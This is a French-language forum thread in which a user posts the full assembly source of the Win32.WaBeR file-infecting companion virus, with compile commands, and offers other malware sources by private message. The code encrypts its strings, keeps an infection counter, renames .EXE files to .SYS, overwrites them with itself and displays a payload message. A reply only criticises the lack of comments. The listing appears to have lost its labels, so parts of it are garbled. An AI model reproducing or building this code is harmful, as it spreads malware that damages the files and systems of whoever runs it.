Code source : Win32.Waber

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Code source : Win32.Waber

Postby DANAO » Sun May 01, 2011 8:30 pm

Un petit Win32 de ma collection.
J'en ai plus d'une dizaine, en plus des codes source de Morris, Bagle et Mydoom.A. Me MP pour ceux qui voudrait s'instruire ;)

; ...:: Win32.WaBeR - ViruS ::...
; Version 2.4
; by -DiA- (c) 02
; GermanY
; Here it is! My 1st Win32.Companion Virus ...success!!! :)
; Don't grumble about the code, it's my 2th Win32.Virus... ...and I go on. =)
; Some Comments:
; -decrypt the strings
; -read the counter >not exist = MAKE IT!
; >if not 0 = go to the virus and infect some files
; >if 0 = jmp to PAYLOAD
; -payload:
; +after 24 starts the payload aktivate
; +it prints a nice message:
; ...:Weed And BEer Rulez:...
; Win32.WaBeR - ViruS
; Version 2.4
; by -DiA- (c)02
; -virus renames found .EXE to .SYS file
; -virus copy itself to the .EXE file
; -after work the host runs!
; -allright...
; Greetz to Monochrom - without you, this virus can't live :)
; To Compile the WaBeR - ViruS:
; tasm32 /z /ml /m3 WaBeR24,,;
; tlink32 -Tpe -c WaBeR24,WaBeR24,, import32.lib
; To Compile the WaBeR - SYS:
; tasm32 /z /ml /m3 WaBeR24sys,,;
; tlink32 -Tpe -c WaBeR24sys,WaBeR24sys,, import32.lib
; rename WaBeR24sys.exe WaBeR24.sys

;.model flat
;extrn MessageBoxA:PROC
;extrn ExitProcess:PROC
;titel db '1st Generation',0
;msg db 'Win32.WaBeR - Virus',10,13
; db 'Version 2.4',10,13
; db 'by -DiA- (c)02',10,13
; db '[my 1st companion virus in win32]',0
;push 16
;push offset titel
;push offset msg
;push 0
;call MessageBoxA
;push 0
;call ExitProcess
;end start

;=====Have Fun...===========================================================================
.model flat

extrn GetCommandLineA:PROC
extrn lstrcpyA:PROC
extrn FindFirstFileA:PROC
extrn CopyFileA:PROC
extrn FindNextFileA:PROC
extrn CreateProcessA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn OpenFile:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn ReadFile:PROC
extrn CloseHandle:PROC
extrn SetFilePointer:PROC

FileName db 'ù€æíÛøßè”ÞÖÖ',-70
titel db '”””€íßßÞšûÔÞšøÿßÈšèÏÖßÀ€””?,-70
msg db 'íÓÔ‰ˆ”íÛøßèš—šìÓÈÏ?,-80,-73
db 'ìßÈÉÓÕÔšˆ”?,-80,-73
db 'ØÚ—þÓû—š’Ù“Šˆ',-80,-73,-80,-73,-80,-73
db 'áê?ûéÿšèÿ?îšîòÿšíÛøßè—ùõïôîÿ蚀š˜ù€æíÛøßè”ÞÖÖ˜ç',-70
FirstNum db '?,-70
FileMask db '”ÿ?',-70
Number db 01d dup (0)
FileAttr dd 0
FileHandle dd 0
Read dd 0
Write dd 0
FindHandle dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
FindFile db 200 dup (0)
CreateFile db 200 dup (0)
VirusFile db 200 dup (0)
OriginFile db 200 dup (0)


;-----Decrypt all Strings-------------------------------------------------------------------
mov esi,offset FileName
mov edi,esi
mov ecx,154d
call DeCrypt

;-----Check the Counter---------------------------------------------------------------------
push 2
push offset FileAttr
push offset FileName
call OpenFile

cmp eax,0FFFFFFFFh
je MakeFile

mov dword ptr [FileHandle],eax

call SetPointer

push 0
push offset Read
push 01d
push offset Number
push dword ptr [FileHandle]
call ReadFile

cmp byte ptr [Number],'0'

dec byte ptr [Number]

call SetPointer

push 0
push offset Write
push 01d
push offset Number
push dword ptr [FileHandle]
call WriteFile

push dword ptr [FileHandle]
call CloseHandle
jmp WaBeR

push 0
push 80h
push 2
push 0
push 0
push 0C0000000h
push offset FileName
call CreateFileA

mov dword ptr [FileHandle],eax

call SetPointer

push 0
push offset Write
push 01d
push offset FirstNum
push dword ptr [FileHandle]
call WriteFile

jmp GOon

push dword ptr [FileHandle]
call CloseHandle

push 16
push offset titel
push offset msg
push 0
call MessageBoxA
jmp exit

push 0
push 0
push 0
push dword ptr [FileHandle]
call SetFilePointer

;-----Decrypt Loop--------------------------------------------------------------------------
xor al,69d
not al
loop DeCrypt

;-----Infect some Filez---------------------------------------------------------------------

call GetCommandLineA

push eax
push offset VirusFile
call lstrcpyA

mov eax,offset VirusFile
cmp byte ptr [eax],'.'
jz FoundPoint1
inc eax
jmp GetPoint1

add eax,04d
mov byte ptr [eax],00

push offset VirusFile+1
push offset OriginFile
call lstrcpyA

mov eax,offset OriginFile
cmp byte ptr [eax],'.'
jz FoundPoint2
inc eax
jmp GetPoint2

inc eax
mov dword ptr [eax],535953h

push offset Win32FindData
push offset FileMask
call FindFirstFileA
mov dword ptr [FindHandle],eax

cmp eax,-1
je RunHost
or eax,eax
jz RunHost

push offset FindFile
push offset CreateFile
call lstrcpyA

mov eax,offset CreateFile
cmp byte ptr [eax],'.'
jz FoundPoint3
inc eax
jmp GetPoint3

inc eax
mov dword ptr [eax],535953h

push 1
push offset CreateFile
push offset FindFile
call CopyFileA

push 0
push offset FindFile
push offset VirusFile+1
call CopyFileA

push offset Win32FindData
push dword ptr [FindHandle]
call FindNextFileA
jmp FindNext

push offset ProcessInfo
push offset StartupInfo
push 0
push 0
push 00000010h
push 0
push 0
push 0
push offset OriginFile
push offset OriginFile
call CreateProcessA

push 0
call ExitProcess
end start
Posts: 6
Joined: Sat Nov 20, 2010 3:31 pm

Postby TorTukiTu » Mon May 02, 2011 5:15 pm

C'est très gentil à toi, DANAO, mais des sources de ce genrs, tu en trouves des gigas sur la toile.

Ca aurait bien plus d'intérêt si tu pouvais nous commenter le code. (tel quel, ça n'a pas grand intérêt pédagogique...)

PS.: essaye de trouver un autre format qu'en texte brut collé sur le fofo pour l'ASM, C'est pas très pratique...

Tortue 974.

PS.: Upload plutot la source quelquepart. C'est pas top de laisser ça sur le fofo, et c'est moche.
Last edited by TorTukiTu on Tue May 03, 2011 5:55 am, edited 2 times in total.
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Postby DANAO » Mon May 02, 2011 11:42 pm

Oui, j'en avais l'intention mais en ce moment je n'ai pas beaucoup le temps, donc je le ferai petit à petit quand j'aurais des moments libres :)
Posts: 6
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